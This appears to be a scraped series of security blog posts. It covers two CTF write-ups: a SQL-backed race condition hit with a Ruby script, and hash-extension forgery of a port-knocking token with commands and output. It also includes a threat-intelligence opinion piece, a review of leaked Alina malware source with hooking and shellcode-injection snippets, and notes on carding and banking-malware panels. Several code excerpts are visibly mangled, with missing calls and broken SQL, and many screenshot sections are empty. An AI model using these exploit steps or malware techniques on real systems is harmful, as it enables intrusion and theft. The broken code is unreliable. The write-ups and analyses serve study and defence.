I tried a few things to test it, but because the result of mysqli_query isn't actually used and errors aren't displayed, it was difficult to tell what was happening. I ended up setting up a local version of the challenge on a Debian VM just so I could play around (I find that having a good debug environment is a key to CTF success!)

After getting it going and turning on register_globals, and messing around a bunch, I found a good query I could use:'1'

That worked on my test app, so I confidently strode to the real app, ran it, and... nothing happened. Rats. Back to the drawing board.

The real vulnerability

So, the goal of the application was to obtain a user account that isn't restricted. When you create an account, it's immediately set to "restricted" by this code in register.php:

        $username = mysqli_real_escape_string($conn, $_POST['username']);
        $password = mysqli_real_escape_string($conn, $_POST['password']);

        $sql = "INSERT into users (username, password) values ('$username', '$password');";
        mysqli_query($conn, $sql);

        $sql = "INSERT into privs (userid, isRestricted) values ((select from users where username='$username'), TRUE);";
        mysqli_query($conn, $sql);
} else {

Then on the login page, it's checked using this code:

        $username = mysqli_real_escape_string($conn, $_POST['username']);

        $sql = "SELECT * from users where username='$username';";
        $result = mysqli_query($conn, $sql);

        $row = $result->fetch_assoc();

        if($_POST['username'] === $row['username'] and $_POST['password'] === $row['password']){
                <h1>Logged in as <?php echo($username);?></h1>

                $uid = $row['id'];
                $sql = "SELECT isRestricted from privs where userid='$uid' and isRestricted=TRUE;";
                $result = mysqli_query($conn, $sql);
                $row = $result->fetch_assoc();
                        <h2>This is a restricted account</h2>

                        <h2><?php include('../key');?></h2>


} else {

My gut reaction for far too long was that it's impossible to bypass that check, because it only selects rows where isRestricted=true!

But after fighting with the register_globals non-starter above, I realized that if there were no matching rows in the privs database, it would return zero results and the check would pass, allowing me access! But how to do that?

I went back to the user creation code in register.php and noticed that the creation code creates the user, then restricts it! There's a lesson to programmers: secure by default.

$sql = "INSERT into users (username, password) values ('$username', '$password');";
mysqli_query($conn, $sql);

$sql = "INSERT into privs (userid, isRestricted) values ((select from users where username='$username'), TRUE);";
mysqli_query($conn, $sql);

That means, if you can create a user account and log in immediately after, before the second query runs, then you can successfully get the key! But I didn't notice that till later, like, today. I actually found another path to exploitation! :)

My exploit

This is where things get a little confusing....

I first noticed there's a similar vulnerability in the code that inserts the account restriction into the user table. There's no logic in the application to prevent the creation of multiple user accounts with the same name! And, if you create multiple accounts with the same name, it looked like only the first account would ever get restricted.

That was my reasoning, anyways (I don't think that's actually true, but that turned out not to matter). However, on login, only the first account is actually retrieved from the database! My thought was, if you could get those two SQL statements to run concurrently, so they run intertwined between two processes, it might just put things in the right order for an exploit!

Sorry if that's confusing to you—that logic is flawed in like every way imaginable, I realized afterwards, but I implemented the code anyways. Here's the main part (you can grab the full exploit here):

require 'httparty'

#TARGET = ""

name = "ron" + rand(100000).to_s(16)


t1 = do |t|
  response = ("#{TARGET}/register.php", :body => { :username => name, :password => name }))

t2 = do |t|
  response = ("#{TARGET}/register.php", :body => { :username => name, :password => name }))

I ran that against my test host and checked the database. Instead of failing miserably, like it by all rights should have, it somehow caused the second query—the INSERT into privs code— to fail entirely! I attempted to log in as the new user, and it gave me the key on my test server.

Honestly, I have no idea why that worked. If I ran it multiple times, it worked somewhere between 1/2 and 1/4 of the time. Not bad, for a race condition! It must have caused a silent SQL error or something, I'm not entirely sure.

Anyway, I then I tried running it against the real service about 100 times, with no luck. I tried running one instance and a bunch in parallel. No deal. Hmm! From my home DSL connection, it was slowwwwww, so I reasoned that maybe there's just too much lag.

To fix that, I copied the exploit to my server, which has high bandwidth (thanks to SkullSpace for letting me keep my gear there :) ) and ran the same exploit, which worked on the first try! That was it, I had the flag.


I'm not entirely sure why my exploit worked, but it worked great (assuming decent latency)!

I realize this challenge (and story) aren't super exciting, but I like that the vulnerability was due to a race condition. Something nice and obscure, that we hear about and occasionally fix, but almost never exploits. Props to the GitS team for creating the challenge!

And also, if anybody can see what I'm missing, please drop me an email ron @ and I'll update this blog. I approve all non-spam comments, eventually, but I don't get notifications for them at the moment.

GitS 2015: (hash extension vulnerability)

As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote :) ))

The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name :) ).

You can download the original level here (Python).

The vulnerability

To track down the vulnerability, let's have a look at the signature algorithm:

def generate_token(h, k, *pl):
        m = struct.pack('!'+'H'*len(pl), *pl)
        mac = h(k+m).digest()
        return mac + m

In that function, h is a hash function (sha-512, specifically), k is a random 16-byte token, randomly generated, and m is an array of 16-bit representation of the ports that the user wishes to open. So if the user wanted to open port 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below).

Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability!

I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of msg + H(secret + msg), the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port!

Let's see how!

Generating a legit token

To use the python script linked above, first run 'setup':

$ python ./ setup
wrote new secret.txt

Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's:

$ cat secret.txt

Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80:

$ python ./ newtoken 80

Notice the first 512 bits (64 bytes) is the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works first!

We start the server:

$ python ./ serve

And in another window, or on another host if you prefer, send the generated token:

$ python ./ knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

In the original window, you'll see that it was successful:

$ python ./ serve
Client: ::1 len 66
allowing host ::1 on port 80

Now, let's figure out how to create a token for port 7175!

Generating an illegit (non-legit?) token

So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack!

Download and compile hash_extender if needed (definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x80"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw).

All said and done, here's the command:

./hash_extender --data-format hex --data 0050 \
  --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \
  --append "1c07" --append-format hex \
  -l 16

You can pass in the algorithm and the desired output format as well, if we don't, it'll just output in every 512-bit-sized hash type. The output defaults to hex, so we're happy with that.

$ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16
Type: sha512
Secret length: 16
New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894
New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Type: whirlpool
Secret length: 16
New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659
New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them:

$ python ./ knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

And checking our server, we see a ton of output, including successfully opening port 7175:

$ python ./ serve
Client: ::1 len 66
allowing host ::1 on port 80
Client: ::1 len 178
allowing host ::1 on port 80
allowing host ::1 on port 32768
allowing host ::1 on port 0
allowing host ::1 on port 0
[...repeated like 100 times...]
allowing host ::1 on port 0
allowing host ::1 on port 0
allowing host ::1 on port 144
allowing host ::1 on port 7175

And that's it! At that point, you can visit and get the key.


This is a pure hash extension vulnerability, which required no special preparation—the hash_extender tool, as written, was perfect for the job!

My favourite part of that is looking at my traffic graph on github:

It makes me so happy when people use my tool, it really does!

Beyond the Buzzwords: Why You Need Threat Intelligence

I dislike buzzwords.

Let me be more precise -- I heavily dislike when a properly useful term is commandeered by the army of marketing people out there in the market space and promptly loses any real meaning. It makes me crazy, as it should make you, when terms devised to speak to some new method, utility, or technology becomes virtually meaningless when everyone uses it to mean everything and nothing all at once. Being in a highly dynamic technical field is hard enough without having to play thesaurus games with the marketing people. They always win anyway.

So when I see things like this post, "7 Security buzzwords that need to be put to rest" on one hand I'm happy someone is out there taking the over-marketing and over-hyping of good terms to task, but on the other hand I'm apprehensive and left wondering whether we've thrown the baby out with the bath-water.

In this case, if you look at slide 8, Threat Intelligence, you have this quote:
"This is a term that has been knocked about in the industry for the last couple of years. It really amounts to little more than a glorified RSS feed once you peel back the covers for most offerings in the market place."

I'm unsure whether the author was going for irony or sarcasm, or has simply never seen a good Threat Intelligence feed before -- but this is just categorically wrong. Publishing this kind of thing is irresponsible, and does a disservice to the reading public who take these words for truth from a journalist.

Hyperbole and Irony

Let's be honest, there are plenty of threat intelligence feeds that match that definition. I can think of a few I'd love to tell you about but non-disclosure agreements make that impractical. Then there are those that provide a tremendous amount of value when they are properly utilized at the proper point in time, by the proper resources.

Take for example a JSON-based feed of validated, known-bad IP addresses from one of the many providers of this type of data. I would hardly call this intelligence, but rather reputational data in the form of a feed. Sure, this is consumed much like you would an RSS feed of news -- except that the intent is typically for automated consumption by tools and technologies that requires very little human intervention.

Is the insinuation here that this type of thing has little value? I would agree that in the grand scheme of intelligence a list of known-bad IP addresses has a very short shelf-life and an complicated utility model which is necessarily more than a binary decision of "good vs. bad" -- but this does not completely destroy its utility to the security organization. Take for example a low-maturity organization who is understaffed, and relies heavily on network-based security devices to protect their assets. Incorporating a known-bad (IP reputation) feed into their currently deployed network security technologies may be more than a simple added layer of security. This may in fact be an evolution, but one that only a lower-level security organization can appreciate.

My point is, don't throw away the potential utility of something like a reputation feed without first considering the context within which it will be useful.

Without Intelligence, We're Blind

I don't know how to make this more clear. After spending a good portion of the last 4 months studying successful and operational security programs I can't imagine a scenario where a security program without the incorporation of threat intelligence is even viable. I'm sorry to report that without a threat-intelligence focused strategy, we're left deploying the same old predictable patterns of network security, antivirus/endpoint and other static defenses which our enemies are well attuned to and can avoid without putting much thought into it.

While I agree, the marketing organizations in the big vendors (and small, to be fair) have all but ruined the reputation of the phrase threat intelligence I dare you to run a successful security program without understanding your threats and adversaries, and be successful at efficient detection and response. Won't happen.

I guess I'm biased since I've spent so much time researching this topic that I'm now what you may consider a true believer. I can sleep well knowing that thorough (and ongoing) research into successful security programs which incorporate threat intelligence leads me to conclude that threat intelligence is essential to an effective and focused enterprise security program. I'm still not an expert, but at least I've seen it both succeed and fail and can tell the difference.

So why the hate? Let's ideate

I get it, security people are experiencing fatigue from buzzwords and terms taken over by marketing people which makes our ears bleed every time someone starts making less than no sense. I get it, I really do. But let's not throw away the baby in the bathwater. Let's not dismiss something that has the potential to transform our security programs into something relevant to today's threats because we're sick of hearing talking heads mis-use and abuse the term.

I also get that when terms are over-hyped and misused it does everyone an injustice. Is an IP reputation list threat intelligence? I wouldn't call it's just data. There are hallmarks of threat intelligence that make it useful and much more than just a buzzword:

  1. it's actionable
  2. it's complete
  3. it's meaningful
Once you have these characteristics for your threat intelligence "feed" then you have significantly more than just an RSS feed. You have something that can act as a catalyst for your security program stuck in the 90's. Let's not let our pull to be snarky get the best of us, and throw away a perfectly legitimate term. Instead, let's take those who mis-use and abuse the term and point them out and call them out for their disservice to our mission.

Alina ‘sparks’ source code review

I got on my hands recently the source code of Alina "sparks", the main 'improvement' that everyone is talking about and make the price of this malware rise is the rootkit feature.
Josh Grunzweig did already an interesting coverage of a sample, but what worth this new version ?

InjectedDLL.c from the source is a Chinese copy-paste of and commented out, replaced with two kernel32 hooks instead, like if the author cannot into hooks :D
a comment is still in Chinese as you can see on the screenshot.

+ this:
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName,LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)
Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
return Result;


// Registry Value Hiding
Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext);
Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);
So many stupid mistakes in the code, no sanity checks in hooks, nothing stable.
Haven't looked at a sample in the wild but i doubt it work anyhow.
Actual rootkit source (body stored as hex array in c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap.

This x86-32 driver is responsible for NtQuerySystemInformation, NtEnumerateValueKey, NtQueryDirectoryFile SSDT hooking.
Driver is ridiculously simple:
  DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc;

BOOL SetHooks()
  if ( !NtQuerySystemInformationOrig )
    NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);
  if ( !NtEnumerateValueKeyOrig )
    NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);
  if ( !NtQueryDirectoryFileOrig )
    NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);
  return TRUE;

All of them hide 'windefender' target process, file, registry.
void InitStrings()
  RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderRegistryString, L"windefender");
It's the malware name, Josh pointed also in this direction on his analysis.
First submitted on VT the 2013-10-17 17:27:10 UTC ( 1 year, 2 months ago )

Overall that dll seems unusued, alina project uses driver i mentioned.
As for project itself, it's still an awful piece of students lab work, here is some log just from attempt to compile:
If SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway.

Two copy-pasted methods with same mistake:
Leaking process information handle pi.hProcess.

Using hKey from failed function call:
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L,  KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {

pThread could be NULL, this is checked only in WriteProcessMemory but not in CreateRemoteThread:
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten);
HANDLE ThreadHandle =  CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);

Where hwid declared as char hwid[8];
Reading invalid data from hdr->hwid: the readable size is 8 bytes, but 18 bytes may be read:
memcpy(outkey, hdr->hwid, 18);

Realloc might return null pointer: assigning null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked:

The prior call to strncpy might not zero-terminate string Result:

Return value of ReadFile ignored. If it will fail anywhere code will be corrupted as cmd variable is not initialized:

Signed unsigned mismatch:

Unreferenced local variable hResult:

Using TerminateThread does not allow proper thread clean up:

Now related to 'editions' sparks have some, for examples the pipes, mutexes, user-agents, process black-list but most of these editions are minors things that anybody can do to 'customise' his own bot.
In any case that can count as a code addition or something 'new'
For the panel... well it's like the bot, nothing changed at all.
It's still the same ugly design, still the same files with same modifications timestamp, no code addition, still the same cookie auth crap like if the coder can't use session in php and so on...

To conclude, the main improvement is a copy/pasted rootkit who don't work, i don't know how many bad guys bought this source for 1k or more but that definitely not worth it.
Overall it's a good example of how people can take a code, announce a rootkit to impress and play everything on malware notoriety.
This remind me the guys who announced IceIX on malware forums and finally the samples was just a basic ZeuS with broken improvements.

Hi Benson.

Tiberium/Consuella USPS money laundering service

Consuella was a 'USPS drop service' run by one of the Lampeduza administrator.
This type of service is used to help credit card thieves to "cash out" by sending carded labels service overseas (or not) via USPS.
They was also constantly recruiting mules in United states to keep addresses in rotation.

Here is what look like the service from an admin point of view:

Add a payement:




Although Consuella was incredibly simple compared to others drop-shipping service such as and who had fake website for mules on the panel.

Phase (Win32/PhaseBot-A)

Small write-up about 'Phase' a malware who appeared and vanished very rapidly.
I had a look on it with MalwareTech who wrote several stories, it was shown that Phase is in reality a 'new' version of Solar bot, at least not so new, the code is so copy/pasted that even Antivirus such as Avast do false positives and now detect Napolar (Solar) as PhaseBot.


Phase support website:

The coder is using public snippet for chatting with customers:
So weak that this is even vulnerable to xss.

Master balance ? less than < 1k
Phase seem not so popular, and got also rapidly lynched by other actors on forums.

Anyway let's have a look on the web panel.








Analyzer detector:





In the wild panel, having Ram scrapper plugin + VNC:

Ram scrapper plugin:

Point-of-sale remote controlled:

Another botnet with hacked point of sale remote controlled:

Wallet stealer:

Phase samples:

Unencrypted Ram scrapper plugin: 1e18ee52d6f0322d065b07ec7bfcbbe8
Unencrypted VNC plugin: 94eefdce643a084f95dd4c91289c3cf0
Panel: c43933e7c8b9d4c95703f798b515b384 (With a small trendMicro signature fail "PHP_SORAYA.A" no this is not the Soraya panel.
Needless to say the panel was also vulnerable.


iBanking is an android malware made to intercept voice and text informations.
The panel is poorly coded.



Phone list:

SMS List:

All SMS (Incomming)

All SMS (Outgoing):

Call list (Incomming):

Call list (Outgoing):

Call list (Missed):


Contact list:

Url report:

Video archives of security conferences and workshops

Just some links for your enjoyment

List of security conferences in 2014

Video archives:

AIDE (Appalachian Institute of Digital Evidence)

Chaos Communication Congress
Digital Bond's S4x14
Circle City Con
GrrCON Information Security Summit & Hacker Conference
Hack in the box HITB
Heidelberg Germany
Workshops, How-tos, and Demos

Special thanks to  Adrian Crenshaw for his collection of videos